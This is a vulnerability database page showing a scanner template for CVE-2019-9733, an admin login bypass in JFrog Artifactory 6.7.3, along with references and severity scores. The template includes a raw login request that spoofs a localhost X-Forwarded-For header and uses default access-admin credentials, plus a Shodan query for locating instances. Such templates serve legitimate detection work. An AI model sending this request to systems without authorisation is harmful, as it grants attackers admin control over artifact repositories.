Vulners
Lucene search
JFrog Artifactory 6.7.3 - Admin Login Bypass
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | JFrog Artifactory Administrator Authentication Bypass Exploit | 21 Mar 201900:00 | – | zdt |
 | CVE-2019-9733 | 26 Jan 202500:00 | – | circl |
 | CVE-2019-9733 | 11 Apr 201918:59 | – | cve |
 | CVE-2019-9733 | 11 Apr 201918:59 | – | cvelist |
 | CVE-2019-9733 | 11 Apr 201919:29 | – | nvd |
 | JFrog Artifactory Administrator Authentication Bypass | 21 Mar 201900:00 | – | packetstorm |
 | Design/Logic Flaw | 11 Apr 201919:29 | – | prion |
 | VulnCheck KEV: CVE-2019-9733 | 26 Nov 202300:00 | – | vulncheck_kev |
id: CVE-2019-9733
info:
name: JFrog Artifactory 6.7.3 - Admin Login Bypass
author: akshansh
severity: critical
description: JFrog Artifactory 6.7.3 is vulnerable to an admin login bypass issue because by default the access-admin account is used to reset the password of the admin account. While this is only allowable from a connection directly from localhost, providing an X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory.
impact: |
Successful exploitation allows unauthorized access to the admin panel.
remediation: |
Upgrade to a patched version of JFrog Artifactory or apply the necessary security patches.
reference:
- http://packetstormsecurity.com/files/152172/JFrog-Artifactory-Administrator-Authentication-Bypass.html
- https://www.ciphertechs.com/jfrog-artifactory-advisory/
- https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6
- https://nvd.nist.gov/vuln/detail/CVE-2019-9733
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-9733
epss-score: 0.53879
epss-percentile: 0.98868
cpe: cpe:2.3:a:jfrog:artifactory:6.7.3:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: jfrog
product: artifactory
shodan-query: cpe:"cpe:2.3:a:jfrog:artifactory"
tags: cve,cve2019,packetstorm,artifactory,login,jfrog,vkev,vuln
http:
- raw:
- |
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
X-Requested-With: artUI
X-Forwarded-For: 127.0.0.1
Request-Agent: artifactoryUI
Content-Type: application/json
Origin: {{BaseURL}}
Referer: {{BaseURL}}/artifactory/webapp/
{"user":"access-admin","password":"password","type":"login"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"username": "access-admin"'
- type: status
status:
- 200
# digest: 4a0a0047304502210081707387c1d4dd9ddf9c663f48d3c2a652dbabf349b7dfb91cec17cd9d8f2b66022064e7af4d101bb58881a15d2cd3719667f859356d2044fb90e995cf1e78203a11:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 39.8
EPSS0.53879